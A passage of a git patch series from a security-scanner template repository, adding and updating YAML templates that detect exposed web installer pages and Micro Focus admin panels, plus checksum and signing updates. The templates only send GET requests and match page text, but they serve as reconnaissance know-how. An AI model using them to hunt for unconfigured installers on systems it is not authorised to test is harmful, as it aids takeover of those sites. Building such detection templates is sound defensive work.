+http/misconfiguration/installer/trilium-notes-installer.yaml:c3bc11c9c011dd659ca6af6d6ddbf4907495d69e http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299c32c8ccfd503ece02fd94 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 @@ -8540,7 +8540,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:52c15cdd3f388704c51a24ad318ac10dae5956da +templates-checksum.txt:5468afe63e9cb7d020875f12c43a0fb8cf98f91d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7f8961f6ff6da4ddcf2387c2ce743b2ff2056a93 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 May 2024 03:52:22 +0000 Subject: [PATCH 045/847] Auto Template Signing [Mon May 20 03:52:22 UTC 2024] :robot: --- http/cves/2022/CVE-2022-22897.yaml | 1 + http/cves/2023/CVE-2023-46347.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 3be9b98bc9..d399f50761 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -87,3 +87,4 @@ http: group: 1 regex: - "\\s*\\s*<\\/version>" +# digest: 4b0a00483046022100fa886b63f46880ebc3ac311badf4173457c77333ee6c3119602d1ae1906343d6022100b40e5474b7dee7644024669adae67a822b8dd7a5e7d62b87095e51ee170e44c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 257b83cf73..53c778381e 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ba7f8d681eec29e6dd0682484b99bef70ea6763f14489f9b94b59485933301e102202d939b5e05c4199a2ae937c418c2dd3947f86b5a14d3ea6ac0fc0defe7065e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5721c96bc02845ab7954abb638f11391ba88cfe4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 10:01:23 +0530 Subject: [PATCH 046/847] Create ids-skills-installer.yaml --- .../installer/ids-skills-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/ids-skills-installer.yaml diff --git a/http/misconfiguration/installer/ids-skills-installer.yaml b/http/misconfiguration/installer/ids-skills-installer.yaml new file mode 100644 index 0000000000..38d61998d8 --- /dev/null +++ b/http/misconfiguration/installer/ids-skills-installer.yaml @@ -0,0 +1,29 @@ +id: ids-skills-installer + +info: + name: IDP Skills Installer - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of an IDS Skills Installer page. + metadata: + verified: true + max-request: 1 + shodan-query: html:"IDP Skills Installer" + tags: install,ids,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/#/install/main" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "IDP Skills Installer" + + - type: status + status: + - 200 From e9c7e33f73e3d752c6cd715282a1a5cec004add7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 10:13:36 +0530 Subject: [PATCH 047/847] Create xbackbone-installer.yaml --- .../installer/xbackbone-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/xbackbone-installer.yaml diff --git a/http/misconfiguration/installer/xbackbone-installer.yaml b/http/misconfiguration/installer/xbackbone-installer.yaml new file mode 100644 index 0000000000..fa5217e3ca --- /dev/null +++ b/http/misconfiguration/installer/xbackbone-installer.yaml @@ -0,0 +1,29 @@ +id: xbackbone-installer + +info: + name: XBackBone Installer - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a XBackBone Installer. + metadata: + verified: true + max-request: 1 + shodan-query: html:"XBackBone Installer" + tags: install,xbackbone,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "XBackBone Installer" + + - type: status + status: + - 200 From 73d55b3cd3a852c62ab76822d1e80ef711204d8c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 10:18:21 +0530 Subject: [PATCH 048/847] Create growi-installer.yaml --- .../installer/growi-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/growi-installer.yaml diff --git a/http/misconfiguration/installer/growi-installer.yaml b/http/misconfiguration/installer/growi-installer.yaml new file mode 100644 index 0000000000..905628e1c0 --- /dev/null +++ b/http/misconfiguration/installer/growi-installer.yaml @@ -0,0 +1,29 @@ +id: growi-installer + +info: + name: GROWI Installer - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a GROWI Installer. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Installer - GROWI" + tags: install,growi,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/installer" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Installer - GROWI" + + - type: status + status: + - 200 From b8164729676d6fae9a1aea2bc417fe452df1c8f4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 11:45:39 +0530 Subject: [PATCH 049/847] Create easy-viserlabs-installer.yaml --- .../installer/easy-viserlabs-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/easy-viserlabs-installer.yaml diff --git a/http/misconfiguration/installer/easy-viserlabs-installer.yaml b/http/misconfiguration/installer/easy-viserlabs-installer.yaml new file mode 100644 index 0000000000..2aea23abde --- /dev/null +++ b/http/misconfiguration/installer/easy-viserlabs-installer.yaml @@ -0,0 +1,29 @@ +id: easy-viserlabs-installer + +info: + name: Easy Installer by ViserLab - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a Easy Installer by ViserLab. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Easy Installer by ViserLab" + tags: install,easy,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Easy Installer by ViserLab" + + - type: status + status: + - 200 From 9485b0bc31f6150918cacf53a5120ea6a07c6901 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 12:21:30 +0530 Subject: [PATCH 050/847] Create openfire-setup.yaml --- .../installer/openfire-setup.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/openfire-setup.yaml diff --git a/http/misconfiguration/installer/openfire-setup.yaml b/http/misconfiguration/installer/openfire-setup.yaml new file mode 100644 index 0000000000..95d42298c4 --- /dev/null +++ b/http/misconfiguration/installer/openfire-setup.yaml @@ -0,0 +1,29 @@ +id: openfire-setup + +info: + name: Openfire Setup - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a Openfire Setup Page. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Welcome to Openfire Setup" + tags: install,openfire,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/setup/index.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to Openfire Setup" + + - type: status + status: + - 200 From b8d5f920a083a10fc3e8433c32e6fd0c00636b1c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 13:47:42 +0530 Subject: [PATCH 051/847] Create wiki-js-installer.yaml --- .../installer/wiki-js-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/wiki-js-installer.yaml diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml new file mode 100644 index 0000000000..c6aa3db99f --- /dev/null +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -0,0 +1,29 @@ +id: wiki-js-installer + +info: + name: Wiki.js Setup - Exposure + author: DhiyaneshDk + severity: high + description: | + Checks for the presence of a Wiki.js Setup Page. + metadata: + verified: true + max-request: 1 + shodan-query: title:"Wiki.js Setup" + tags: install,openfire,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Wiki.js Setup" + + - type: status + status: + - 200 From a1947c8784ec95d390bcfd7901c96338cfb1344b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 20 May 2024 13:48:46 +0530 Subject: [PATCH 052/847] update --- http/misconfiguration/installer/wiki-js-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml index c6aa3db99f..71f619e282 100644 --- a/http/misconfiguration/installer/wiki-js-installer.yaml +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Wiki.js Setup" - tags: install,openfire,exposure,misconfig + tags: install,wiki-js,exposure,misconfig http: - method: GET From 683e09158742e7375257592d4c0a4696dbdf61fc Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 11:48:27 +0200 Subject: [PATCH 053/847] Add files via upload --- .../microfocus-admin-server.yaml | 31 +++++++++++++------ 1 file changed, 21 insertions(+), 10 deletions(-) diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index d0317d8a0b..a3127e0a6b 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -2,7 +2,7 @@ id: microfocus-admin-server info: name: Micro Focus Enterprise Server Admin Panel - Detect - author: theabhinavgaur + author: theabhinavgaur,righettod severity: info description: Micro Focus Enterprise Server Admin panel was detected. classification: @@ -21,15 +21,26 @@ http: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/nps/servlet/portalservice" + - "{{BaseURL}}/nds" + - "{{BaseURL}}/_LOGIN_SERVER_" + + stop-at-first-match: true + + redirects: true + max-redirects: 2 - matchers-condition: and matchers: - - type: word - part: header - words: - - "Micro Focus DSD" + - type: dsl + dsl: + - 'status_code == 200 && contains(to_lower(header), "micro focus dsd")' + - 'status_code == 200 && contains_any(to_lower(body), "micro focus imanager", "micro focus imonitor", "micro focus remote manager", "micro focus open enterprise server")' + condition: or - - type: status - status: - - 200 -# digest: 4a0a004730450220434535888e9d2c7013c1604e095f8495b8b77f8f89b5dcee304bc4053c58c9d8022100ec370d625fc73d009cc2b2e158d64bf5b44186713c098461bbbabb34482fb73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Micro\s+Focus\s+Open\s+Enterprise\s+Server\s+([A-Z0-9\s]+)' + - '(?i)Copyright\s+([0-9]+)\s+Micro\s+Focus' \ No newline at end of file From 2104f6a7966113fa9b6f42ab3f1a6fbb11a7f868 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 17:08:18 +0200 Subject: [PATCH 054/847] Add files via upload --- http/exposed-panels/microfocus-vibe-panel.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-vibe-panel.yaml b/http/exposed-panels/microfocus-vibe-panel.yaml index ce86900f15..712bf493f2 100644 --- a/http/exposed-panels/microfocus-vibe-panel.yaml +++ b/http/exposed-panels/microfocus-vibe-panel.yaml @@ -2,7 +2,7 @@ id: microfocus-vibe-panel info: name: Micro Focus Vibe Login Panel - Detect - author: ritikchaddha + author: ritikchaddha,righettod severity: info description: Micro Focus Vibe login panel was detected. classification: @@ -37,4 +37,10 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5cade6702eb0c2e91f23f81888a8c1b56b93f12d127fd6813d54654f2af7cae022100981ff04a3c6f182ff0ae8238cc822826f214f112ee057c36829c3d16d62cb583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Copyright\s+([0-9-]+)\s+Micro\s+Focus' \ No newline at end of file From 65486eb5cc10618cfcf77911d9b5881e03d40716 Mon Sep 17 00:00:00 2001 From: dcruzec Date: Mon, 20 May 2024 11:56:42 -0400 Subject: [PATCH 055/847] osnexus-quantastor-management-console --- ...osnexus-quantastor-management-console.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/exposed-panels/osnexus-quantastor-management-console.yaml diff --git a/http/exposed-panels/osnexus-quantastor-management-console.yaml b/http/exposed-panels/osnexus-quantastor-management-console.yaml new file mode 100644 index 0000000000..b1246ca697 --- /dev/null +++ b/http/exposed-panels/osnexus-quantastor-management-console.yaml @@ -0,0 +1,37 @@ +id: osnexus-quantastor-management-console + +info: + name: OSNEXUS QuantaStor Management Console - Detect + author: Charles D + severity: info + description: OSNEXUS QuantaStor Management Console was detected + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.title:"OS NEXUS QuantaStor Manager" + tags: management-console,login,osnexus-quantastor,osnexus + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "OS NEXUS QuantaStor Manager" + part: body + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "'name="qsversion" content="([^"]+)"'" From 39d289cf47da49f95e4a71d9645bcddb1dc5d9cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 May 2024 17:12:07 +0000 Subject: [PATCH 056/847] Auto Generated Templates Checksum [Mon May 20 17:12:07 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c50f4a61a9..38dded005c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2534,7 +2534,7 @@ http/cves/2022/CVE-2022-2219.yaml:f7b399fbf13b315ba3572bb95e8a517605780ccc http/cves/2022/CVE-2022-22242.yaml:b436f4fa38b41e393a70c271ce5808da14ca1200 http/cves/2022/CVE-2022-22536.yaml:2a50caf1a9f68f3369e917f3bb7f1d8e6b65b6d8 http/cves/2022/CVE-2022-22733.yaml:89003df5b937b3ab5ca97bea819a242ba1f8fbee -http/cves/2022/CVE-2022-22897.yaml:950280f14d1635b6c9c90c391543df7d5358c9ac +http/cves/2022/CVE-2022-22897.yaml:da96a058c0b51cabc86662041dbebd679ebcaaed http/cves/2022/CVE-2022-2290.yaml:fa4cd065d732bf98911b59c6654a606b08743383 http/cves/2022/CVE-2022-22947.yaml:eb9d29cf2146e3457d9e38b5c4f1bdd37b49f9dc http/cves/2022/CVE-2022-22954.yaml:7fc1b436de35daea85136a6ad03332cc25cf27e4 @@ -3177,7 +3177,7 @@ http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 -http/cves/2023/CVE-2023-46347.yaml:dd09061e7e6da8f7b1a2804140fd6b019576d0f2 +http/cves/2023/CVE-2023-46347.yaml:45e9463fdbd5e2ec433e92f26e86c456fae42ffa http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c @@ -3293,6 +3293,7 @@ http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 +http/cves/2024/CVE-2024-33288.yaml:be6ad313e9030dff2c7c036bd3887b32777b2120 http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c @@ -8540,7 +8541,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5468afe63e9cb7d020875f12c43a0fb8cf98f91d +templates-checksum.txt:85b9a8d51ed310ef703f4e9e572e29cae8f119fe wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6c23347f15fc1cbc25286e48ba2c9fb80877d962 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 20 May 2024 17:12:26 +0000 Subject: [PATCH 057/847] Auto Generated New Template Addition List [Mon May 20 17:12:25 UTC 2024] :robot: --- .new-additions | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.new-additions b/.new-additions index b4b4cc93eb..be83b3912a 100644 --- a/.new-additions +++ b/.new-additions @@ -6,9 +6,11 @@ http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-44813.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml +http/cves/2023/CVE-2023-6065.yaml http/cves/2024/CVE-2024-0200.yaml http/cves/2024/CVE-2024-1561.yaml http/cves/2024/CVE-2024-3097.yaml +http/cves/2024/CVE-2024-33288.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml @@ -24,7 +26,9 @@ http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/installer/custom-xoops-installer.yaml +http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml +http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml From d8836f303acd6fd28c314020542ca6c58fff0149 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 May 2024 17:12:42 +0000 Subject: [PATCH 059/847] Auto Generated Templates Checksum [Mon May 20 17:12:42 UTC 2024] :robot: --- templates-checksum.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 38dded005c..6cfe2a73f3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3217,6 +3217,7 @@ http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 http/cves/2023/CVE-2023-6023.yaml:c537c8a9c6bae27008abc07163a9f67f083e77c1 http/cves/2023/CVE-2023-6038.yaml:38ab1d22eb9a68f42042f232196bd556273e75e1 http/cves/2023/CVE-2023-6063.yaml:ce30538ac7371880f65b9247ca0da8dd6e844c05 +http/cves/2023/CVE-2023-6065.yaml:ec709351895594195cd98f73ad9df3dcd7487d61 http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341 http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6 http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0 @@ -5397,6 +5398,7 @@ http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b431 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 +http/misconfiguration/installer/easy-viserlabs-installer.yaml:27d9b628a6aa3315ab36792659f07e5b2aa37968 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -5409,6 +5411,7 @@ http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d +http/misconfiguration/installer/ids-skills-installer.yaml:095eb407b5a42dfeb59dc77420189df7a9200249 http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc @@ -8541,7 +8544,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:85b9a8d51ed310ef703f4e9e572e29cae8f119fe +templates-checksum.txt:8df1977f5606fe1c17bd7067982ebf8e2bcee7f3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 586308ecc93e5f9003d0b2a92fccecb13ff6f9be Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 20 May 2024 17:13:08 +0000 Subject: [PATCH 060/847] Syncing Templates --- .github/workflows/templates-sync.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 37fdd42f29..919dfe9a16 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,9 +11,11 @@ on: - 'http/cves/2023/CVE-2023-44813.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' + - 'http/cves/2023/CVE-2023-6065.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/cves/2024/CVE-2024-1561.yaml' - 'http/cves/2024/CVE-2024-3097.yaml' + - 'http/cves/2024/CVE-2024-33288.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' @@ -29,7 +31,9 @@ on: - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' - 'http/misconfiguration/installer/custom-xoops-installer.yaml' + - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' + - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' From 03a3ee50afb4caa900d184790a02102cb844413d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 May 2024 17:13:52 +0000 Subject: [PATCH 061/847] Auto Template Signing [Mon May 20 17:13:52 UTC 2024] :robot: --- http/cves/2024/CVE-2024-33288.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-33288.yaml b/http/cves/2024/CVE-2024-33288.yaml index 23f85208d8..e21a1bf426 100644 --- a/http/cves/2024/CVE-2024-33288.yaml +++ b/http/cves/2024/CVE-2024-33288.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d0cb8ec2ec256e7e491fdc192a814375574175cd Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 19:38:54 +0200 Subject: [PATCH 062/847] Add files via upload --- ...pplication-lifecycle-management-panel.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml diff --git a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml b/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml new file mode 100644 index 0000000000..0f10c8531b --- /dev/null +++ b/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml @@ -0,0 +1,37 @@ +id: microfocus-application-lifecycle-management-panel + +info: + name: Micro Focus Application Lifecycle Management Panel - Detect + author: righettod + severity: info + description: | + Micro Focus Application Lifecycle Management login panel was detected. + reference: + - https://www.microfocus.com/ + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"Micro Focus Application Lifecycle Management" + tags: panel,microfocus,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/qcbin/" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "micro focus application lifecycle management", "
application lifecycle", "

application lifecycle")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Micro\s+Focus\s+Application\s+Lifecycle\s+Management\s+([0-9.]+)' \ No newline at end of file From 30de1cb4859427308b74c315b45f969228d4ab98 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 19:42:48 +0200 Subject: [PATCH 063/847] Updated reference URL --- .../microfocus-application-lifecycle-management-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml b/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml index 0f10c8531b..1265b3970d 100644 --- a/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml +++ b/http/exposed-panels/microfocus-application-lifecycle-management-panel.yaml @@ -7,7 +7,7 @@ info: description: | Micro Focus Application Lifecycle Management login panel was detected. reference: - - https://www.microfocus.com/ + - https://www.opentext.com/products/alm-quality-center metadata: max-request: 1 verified: true @@ -34,4 +34,4 @@ http: part: body group: 1 regex: - - '(?i)Micro\s+Focus\s+Application\s+Lifecycle\s+Management\s+([0-9.]+)' \ No newline at end of file + - '(?i)Micro\s+Focus\s+Application\s+Lifecycle\s+Management\s+([0-9.]+)' From a6aa7e0ba6ee18a646971613ea3a4ef829c7723d Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 20 May 2024 20:04:20 +0200 Subject: [PATCH 064/847] Add files via upload --- .../microfocus-iprint-appliance-detect.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/technologies/microfocus-iprint-appliance-detect.yaml diff --git a/http/technologies/microfocus-iprint-appliance-detect.yaml b/http/technologies/microfocus-iprint-appliance-detect.yaml new file mode 100644 index 0000000000..33d6e1f433 --- /dev/null +++ b/http/technologies/microfocus-iprint-appliance-detect.yaml @@ -0,0 +1,34 @@ +id: microfocus-iprint-appliance-detect + +info: + name: Micro Focus iPrint Appliance - Detect + author: righettod + severity: info + description: | + Micro Focus iPrint Appliance was detected. + reference: + - https://www.opentext.com/products/enterprise-server + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"Micro Focus iPrint Appliance" + 